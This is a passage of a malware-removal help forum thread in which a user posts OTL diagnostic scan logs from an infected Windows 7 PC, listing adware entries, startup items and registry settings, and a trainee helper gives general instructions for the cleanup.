O1 HOSTS File: ([2009/06/10 14:00:26 | 000,000,824 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O2:[b]64bit:
- BHO: (avast! Online Security) - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll (AVAST Software)
O2:[b]64bit:
- BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2:[b]64bit:
- BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O2 - BHO: (tPerfeictcoupOOnu) - {3DC14D9B-955B-8224-6689-C360753795A6} - C:\ProgramData\tPerfeictcoupOOnu\ASr_l6q7G_.dll ()
O2 - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (avast! Online Security) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
O2 - BHO: (no name) - {95B7759C-8C7F-4BF1-B163-73684A933233} - No CLSID value found.
O2 - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O3:[b]64bit:
- HKLM\..\Toolbar: (avast! Online Security) - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll (AVAST Software)
O3 - HKLM\..\Toolbar: (avast! Online Security) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
O4:[b]64bit:
- HKLM..\Run: [HotKeysCmds] C:\Windows\SysNative\hkcmd.exe (Intel Corporation)
O4:[b]64bit:
- HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxtray.exe (Intel Corporation)
O4:[b]64bit:
- HKLM..\Run: [Logitech Download Assistant] C:\Windows\SysNative\LogiLDA.dll (Logitech, Inc.)
O4:[b]64bit:
- HKLM..\Run: [Persistence] C:\Windows\SysNative\igfxpers.exe (Intel Corporation)
O4:[b]64bit:
- HKLM..\Run: [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Realtek Semiconductor)
O4 - HKLM..\Run: [avast] C:\Program Files\AVAST Software\Avast\avastUI.exe (AVAST Software)
O4 - HKLM..\Run: [FJTWAIN Setup] C:\Windows\Twain_32\fjscan32\FjtwMkup.exe (FUJITSU LIMITED)
O4 - HKLM..\Run: [FtLnSOP_setup] C:\Windows\twain_32\Fjscan32\SOP\FtLnSOP.exe (PFU LIMITED)
O4 - HKLM..\Run: [FTPWRENV] C:\Windows\twain_32\Fjscan32\FTPWREVT\FTPWREVT.exe (PFU LIMITED)
O4 - HKLM..\Run: [IAStorIcon] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIconLaunch.exe (Intel Corporation)
O4 - HKLM..\Run: [IDrive Background process] "C:\Program Files (x86)\IDriveWindows\idwbg_600.exe" File not found
O4 - HKLM..\Run: [IDrive Tray] "C:\Program Files (x86)\IDriveWindows\idrivetray.exe" min File not found
O4 - HKLM..\Run: [IMSS] C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PIconStartup.exe (Intel Corporation)
O4 - HKLM..\Run: [QuickFinder Scheduler] c:\Program Files (x86)\Corel\WordPerfect Office X4\Programs\QFSCHD140.EXE (Corel Corporation)
O4 - HKLM..\Run: [USB3MON] C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe (Intel Corporation)
O4 - HKCU..\Run: [ApplePhotoStreams] C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe (Apple Inc.)
O4 - HKCU..\Run: [iCloudServices] C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe (Apple Inc.)
O4 - HKCU..\Run: [IDrive Background process] "C:\Program Files (x86)\IDriveWindows\idwbg_600.exe" File not found
O4 - HKCU..\Run: [IDrive Tray] "C:\Program Files (x86)\IDriveWindows\idrivetray.exe" min File not found
O4 - HKCU..\Run: [Optimizer Pro] C:\Program Files (x86)\Optimizer Pro\OptProLauncher.exe (PC Utilities Software Limited)
O4 - HKCU..\RunOnce: [FlashPlayerUpdate] C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_14_0_0_145_Plugin.exe (Adobe Systems Incorporated)
O4 - Startup: C:\Users\administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Verizon Wireless Software Utility Application for Android – Samsung.lnk = C:\Users\Administrator\AppData\Roaming\VERIZON\UA_ar\UA.exe (SAMSUNG Electornics Co., Ltd.)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLUA = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: PromptOnSecureDesktop = 0
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O8:[b]64bit:
- Extra context menu item: Open with WordPerfect - c:\Program Files (x86)\Corel\WordPerfect Office X4\Programs\WPLauncher.hta ()
O8 - Extra context menu item: Open with WordPerfect - c:\Program Files (x86)\Corel\WordPerfect Office X4\Programs\WPLauncher.hta ()
O10:[b]64bit:
- NameSpace_Catalog5\Catalog_Entries64\000000000007 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000007 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O13[b]64bit:
- gopher Prefix: missing
O13 - gopher Prefix: missing
O16 - DPF: {FD0B6769-6490-4A91-AA0A-B5AE0DC75AC9} https://secure.logme...rl.cab?lmi=1007 (Performance Viewer Activex Control)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = BRESSMAN.LOCAL
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{09416B0F-7D33-4571-9927-E3FB86D5F686}: DhcpNameServer = 192.168.1.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{09416B0F-7D33-4571-9927-E3FB86D5F686}: NameServer = 192.168.1.2,208.67.220.220
O18:[b]64bit:
- Protocol\Handler\ms-help - No CLSID value found
O20:[b]64bit:
- HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:[b]64bit:
- HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)
O20:[b]64bit:
- Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation)
O21:[b]64bit:
- SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O33 - MountPoints2\{b0576574-9432-11e3-8cb8-bc5ff496e865}\Shell - "" = AutoRun
O33 - MountPoints2\{b0576574-9432-11e3-8cb8-bc5ff496e865}\Shell\AutoRun\command - "" = E:\VZW_Software_upgrade_assistant.exe
O34 - HKLM BootExecute: (autocheck autochk *)
O35:[b]64bit:
- HKLM\..comfile [open] -- "%1" %*
O35:[b]64bit:
- HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:[b]64bit:
- HKLM\...com [@ = comfile] -- "%1" %*
O37:[b]64bit:
- HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/08/29 17:54:43 | 000,000,000 | -HSD | C] -- C:\Config.Msi
[2014/08/27 07:42:31 | 000,000,000 | ---D | C] -- C:\ProgramData\tPerfeictcoupOOnu
[2014/08/26 22:42:28 | 000,000,000 | ---D | C] -- C:\ProgramData\b1b7a188cb35d8a4
[2014/08/26 13:21:34 | 000,000,000 | ---D | C] -- C:\ProgramData\Avg_Update_0814tb
[2014/08/07 15:28:25 | 000,000,000 | ---D | C] -- C:\Users\administrator\AppData\Local\Apple Computer
[2014/08/07 15:27:54 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Safari
[2014/08/07 15:27:54 | 000,000,000 | ---D | C] -- C:\ProgramData\Apple Computer
[2014/08/07 15:26:39 | 000,000,000 | ---D | C] -- C:\Users\administrator\AppData\Roaming\Systweak
[2014/08/07 15:23:00 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Maintenance Service
[2014/08/07 14:27:17 | 000,061,584 | ---- | C] (StdLib) -- C:\Windows\SysNative\drivers\{55dce8ba-9dec-4013-937e-adbf9317d990}w64.sys
[2014/08/07 14:06:42 | 000,000,000 | ---D | C] -- C:\Users\administrator\Documents\VAL HEALTH RECORDS
[2014/08/06 12:29:17 | 000,000,000 | ---D | C] -- C:\Users\administrator\Documents\Optimizer Pro
[2014/08/06 12:29:16 | 000,000,000 | ---D | C] -- C:\Users\administrator\AppData\Roaming\Optimizer Pro
[2014/08/06 12:24:45 | 000,000,000 | ---D | C] -- C:\Users\administrator\AppData\Local\IsolatedStorage
[2014/08/06 12:24:34 | 000,000,000 | ---D | C] -- C:\Users\administrator\AppData\Roaming\WSE_Astromenda
[2014/08/06 12:24:21 | 000,000,000 | ---D | C] -- C:\ProgramData\Driver Support
[2014/08/06 12:24:14 | 000,000,000 | ---D | C] -- C:\Program Files\Earth Networks
[2014/08/06 12:24:12 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Deal Keeper
[2014/08/06 12:24:10 | 000,000,000 | ---D | C] -- C:\Users\administrator\AppData\Roaming\Astromenda
[2014/08/06 12:24:05 | 000,000,000 | -H-D | C] -- C:\ProgramData\~0
[2014/08/06 12:24:01 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Optimizer Pro v3.2
[2014/08/06 12:23:58 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Optimizer Pro
[2 C:\Users\administrator\Documents\*.tmp files -> C:\Users\administrator\Documents\*.tmp -> ]
[1 C:\Windows\SysNative\*.tmp files -> C:\Windows\SysNative\*.tmp -> ]
 
========== Files - Modified Within 30 Days ==========
 
[2014/09/02 14:17:00 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014/09/02 14:00:00 | 000,000,898 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/09/02 11:51:00 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d.job
[2014/09/01 16:01:00 | 000,000,894 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/09/01 05:02:11 | 000,032,080 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2014/09/01 05:02:11 | 000,032,080 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2014/08/28 19:17:11 | 000,000,348 | ---- | M] () -- C:\Windows\tasks\0814tbUpdateInfo.job
[2014/08/28 09:04:38 | 000,000,828 | ---- | M] () -- C:\Windows\tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon.job
[2014/08/28 03:21:19 | 000,787,630 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2014/08/28 03:21:19 | 000,666,010 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2014/08/28 03:21:19 | 000,123,316 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2014/08/28 03:17:10 | 000,428,608 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT
[2014/08/28 03:17:06 | 000,034,752 | ---- | M] () -- C:\Windows\SysNative\drivers\WPRO_41_2001.sys
[2014/08/28 03:16:37 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014/08/28 03:16:23 | 1896,972,287 | -HS- | M] () -- C:\hiberfil.sys
[2014/08/25 00:24:01 | 000,000,089 | ---- | M] () -- C:\Users\administrator\AppData\Roaming\WB.CFG
[2014/08/18 17:35:40 | 001,094,673 | ---- | M] () -- C:\Users\administrator\Desktop\val declination.pdf
[2014/08/18 16:39:58 | 000,000,587 | ---- | M] () -- C:\Users\administrator\Desktop\DETOX SUMMIT.lnk
[2014/08/13 01:01:53 | 000,002,183 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2014/08/07 15:28:19 | 000,002,515 | ---- | M] () -- C:\Users\administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\Apple Safari.lnk
[2014/08/07 15:28:19 | 000,002,491 | ---- | M] () -- C:\Users\Public\Desktop\Safari.lnk
[2014/08/07 15:23:42 | 000,001,147 | ---- | M] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk
[2014/08/06 16:29:08 | 000,061,584 | ---- | M] (StdLib) -- C:\Windows\SysNative\drivers\{55dce8ba-9dec-4013-937e-adbf9317d990}w64.sys
[2014/08/06 12:24:20 | 000,000,264 | ---- | M] () -- C:\Users\administrator\Desktop\Cut the Rope.url
[2014/08/06 12:24:00 | 000,001,062 | ---- | M] () -- C:\Users\administrator\Desktop\Optimizer Pro.lnk
[2 C:\Users\administrator\Documents\*.tmp files -> C:\Users\administrator\Documents\*.tmp -> ]
[1 C:\Windows\SysNative\*.tmp files -> C:\Windows\SysNative\*.tmp -> ]
 
========== Files Created - No Company Name ==========
 
[2014/08/29 18:00:17 | 000,000,030 | ---- | C] () -- C:\AVScanner.ini
[2014/08/26 13:21:34 | 000,000,348 | ---- | C] () -- C:\Windows\tasks\0814tbUpdateInfo.job
[2014/08/24 08:24:01 | 000,000,089 | ---- | C] () -- C:\Users\administrator\AppData\Roaming\WB.CFG
[2014/08/18 17:35:39 | 001,094,673 | ---- | C] () -- C:\Users\administrator\Desktop\val declination.pdf
[2014/08/18 16:39:58 | 000,000,587 | ---- | C] () -- C:\Users\administrator\Desktop\DETOX SUMMIT.lnk
[2014/08/07 15:28:19 | 000,002,515 | ---- | C] () -- C:\Users\administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\Apple Safari.lnk
[2014/08/07 15:28:19 | 000,002,503 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Safari.lnk
[2014/08/07 15:28:19 | 000,002,491 | ---- | C] () -- C:\Users\Public\Desktop\Safari.lnk
[2014/08/07 15:26:37 | 000,020,328 | ---- | C] () -- C:\Windows\SysNative\roboot64.exe
[2014/08/07 15:23:01 | 000,001,159 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
[2014/08/07 15:23:01 | 000,001,147 | ---- | C] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk
[2014/08/06 12:24:20 | 000,000,264 | ---- | C] () -- C:\Users\administrator\Desktop\Cut the Rope.url
[2014/08/06 12:24:00 | 000,001,062 | ---- | C] () -- C:\Users\administrator\Desktop\Optimizer Pro.lnk
[2014/03/19 13:42:57 | 000,003,754 | ---- | C] () -- C:\Program Files (x86)\Mozilla Firefoxsafeguard-secure-search.xml
[2013/10/24 11:29:24 | 000,002,516 | -HS- | C] () -- C:\ProgramData\KGyGaAvL.sys
[2013/10/24 11:29:24 | 000,000,088 | RHS- | C] () -- C:\ProgramData\5F4EBEF46F.sys
[2013/10/14 13:18:05 | 000,113,224 | ---- | C] () -- C:\Users\administrator\g2ax_customer_downloadhelper_win32_x86.exe
[2013/10/11 14:30:48 | 000,002,958 | RHS- | C] () -- C:\ProgramData\ntuser.pol
[2013/10/11 12:46:43 | 000,217,176 | ---- | C] () -- C:\Windows\SysWow64\unrar.dll
[2013/10/11 11:42:55 | 000,000,712 | ---- | C] () -- C:\Windows\FJTWSTI.INI
[2013/09/25 08:16:27 | 000,779,752 | ---- | C] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2013/09/25 08:10:12 | 000,755,048 | ---- | C] () -- C:\Windows\SysWow64\igcodeckrng700.bin
[2013/09/25 08:10:12 | 000,598,780 | ---- | C] () -- C:\Windows\SysWow64\igvpkrng700.bin
[2013/09/25 08:10:12 | 000,064,512 | ---- | C] () -- C:\Windows\SysWow64\igdde32.dll
[2013/03/07 16:24:10 | 000,974,848 | ---- | C] () -- C:\Windows\SysWow64\cis-2.4.dll
[2013/03/07 16:24:10 | 000,081,920 | ---- | C] () -- C:\Windows\SysWow64\issacapi_bs-2.3.dll
[2013/03/07 16:24:10 | 000,065,536 | ---- | C] () -- C:\Windows\SysWow64\issacapi_pe-2.3.dll
[2013/03/07 16:24:10 | 000,057,344 | ---- | C] () -- C:\Windows\SysWow64\issacapi_se-2.3.dll
[2013/01/23 07:12:06 | 000,009,584 | ---- | C] () -- C:\Windows\SysWow64\ractrlkeyhook.dll
 
========== ZeroAccess Check ==========
 
[2009/07/13 21:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2014/06/24 19:05:42 | 014,175,744 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014/06/24 18:41:30 | 012,874,240 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/13 18:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 20:24:25 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/13 18:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
 
========== LOP Check ==========
 
[2014/08/06 12:24:10 | 000,000,000 | ---D | M] -- C:\Users\administrator\AppData\Roaming\Astromenda
[2013/10/14 13:21:52 | 000,000,000 | ---D | M] -- C:\Users\administrator\AppData\Roaming\Fujitsu
[2014/08/06 12:29:16 | 000,000,000 | ---D | M] -- C:\Users\administrator\AppData\Roaming\Optimizer Pro
[2014/08/08 13:56:26 | 000,000,000 | ---D | M] -- C:\Users\administrator\AppData\Roaming\Systweak
[2014/09/02 12:43:44 | 000,000,000 | ---D | M] -- C:\Users\administrator\AppData\Roaming\TSScan
[2013/10/11 14:48:01 | 000,000,000 | ---D | M] -- C:\Users\administrator\AppData\Roaming\Ulead Systems
[2014/03/14 18:01:49 | 000,000,000 | ---D | M] -- C:\Users\administrator\AppData\Roaming\Unity
[2014/08/06 12:24:34 | 000,000,000 | ---D | M] -- C:\Users\administrator\AppData\Roaming\WSE_Astromenda
 
========== Purity Check ==========
 
 
 
========== Alternate Data Streams ==========
 
@Alternate Data Stream - 131 bytes -> C:\ProgramData\Temp:373E1720

< End of report >
 


  • 0

Advertisements


#2
BrianDrab

BrianDrab

    Trusted Helper

  • Malware Removal
  • 3,583 posts

Hi. My name is Brian, and I will be helping you with Malware Removal.

 

I am currently in training and my posts will need to be reviewed by an expert, so expect a slight delay between posts.
 



- General Instructions -

  • Please read all instructions and fixes thoroughly. Read the ENTIRE post BEFORE performaning any steps so you understand all that needs to be done.
  • I would advise printing any instructions for easy reference as some of the fixes may require you to boot in Safe mode. Access to these instructions may not be available in Safe Mode.
  • Any fixes provided by myself are for this log file only and should not be used on any other systems.
  • Do not run any other removal software or perform updates other than the ones I provide, as it will complicate the cleaning process.
  • You have 4 days to reply to each post or the topic will be closed. You will be able to request that the topic be re-opened by sending me a PM (Personal Message) or PM a moderator.
  • Please feel free to ask any questions, especially if you are having problems with my instructions.


- Save ALL Tools to your Desktop-

 

All tools that I have you download should be placed on the desktop unless otherwise stated. If you are familiar with how to save files to the desktop then you can skip this step.

 

Since you are continuing with this step then I assume you are unfamiliar with saving files to your desktop. As a result it's easiest if you configure your browser(s) to download any tools to the desktop by default. Please use the appropriate instructions below depending on the browser you are using.

Chrome.JPGGoogle Chrome - Click the "Customize and control Google Chrome" button in the upper right-corner of the browser.Settings.JPG Choose Settings. at the bottom of the screen click the
"Show advanced settings..." link. Scroll down to find the Downloads section and click the Change... button. Select your desktop and click OK.

Firefox.JPGMozilla Firefox - Click the "Open Menu" button in the upper right-corner of the browser. Settings.JPG Choose Options. In the downloads section, click the Browse button, click on the Desktop folder
and the click the "Select Folder" button. Click OK to get out of the Options menu.

IE.jpgInternet Explorer - Click the Tools menu in the upper right-corner of the browser. Tools.JPG Select View downloads. Select the Options link in the lower left of the window. Click Browse and
select the Desktop and then choose the Select Folder button. Click OK to get out of the download options screen and then click Close to get out of the View Downloads screen.

NOTE: IE8 Does not support changing download locations in this manner. You will need to download the tool(s) to the default folder, usually Downloads, then copy them to the desktop.

 


- Finally Before We Start-

 

Removing malware is a complicated multiple step process, Please stay with me until I have declared your system clean. I strongly recommend you backup your personal files and folders. Although rare, attempting to remove malware can render your machine unbootable or cause data loss. Having backups of your data is your responsibility. Your security programs may give warnings for some of the tools I will ask you to use. Be assured, any links I give are safe.

 

 

 

I'll review your logs and get back to you shortly. Thank you.


  • 0

#3
valgalvez

valgalvez

    Member

  • Topic Starter
  • Member
  • PipPip
  • 32 posts

Got it. Thanks Brian


  • 0

#4
BrianDrab

BrianDrab

    Trusted Helper

  • Malware Removal
  • 3,583 posts

Would you mind posting the contents of your Extras.txt file? It will be in the same location as OTL (looks like your downloads folder). Thank you.


  • 0

#5
valgalvez

valgalvez

    Member

  • Topic Starter
  • Member
  • PipPip
  • 32 posts

Hope this is it:

 

OTL Extras logfile created on: 9/2/2014 2:53:58 PM - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\administrator\Downloads
64bit- Professional Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17239)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
7.69 Gb Total Physical Memory | 5.06 Gb Available Physical Memory | 65.78% Memory free
15.38 Gb Paging File | 12.54 Gb Available in Paging File | 81.57% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 465.66 Gb Total Space | 407.30 Gb Free Space | 87.47% Space Free | Partition Type: NTFS
 
Computer Name: OFFICE2 | User Name: Administrator | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Extra Registry (SafeList) ==========
 
 
========== File Associations ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.html[@ = htmlfile] -- C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
.url[@ = InternetShortcut] -- C:\Windows\SysNative\rundll32.exe (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\Windows\SysWow64\control.exe (Microsoft Corporation)
.html [@ = htmlfile] -- C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
 
[HKEY_CURRENT_USER\SOFTWARE\Classes\<extension>]
.html [@ = FirefoxHTML] -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
 
========== Shell Spawning ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
http [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
https [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
InternetShortcut [open] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l (Microsoft Corporation)
InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [AddToPlaylistVLC] -- "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1" (VideoLAN)
Directory [Browse with Corel PaintShop Pro X6] -- "c:\Program Files\Corel\Corel PaintShop Pro X6 (64-bit)\Corel PaintShop Pro.exe" "%L" (Corel, Inc.)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [PlayWithVLC] -- "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1" (VideoLAN)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- "C:\Program Files\Internet Explorer\iexplore.exe" (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
http [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
https [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
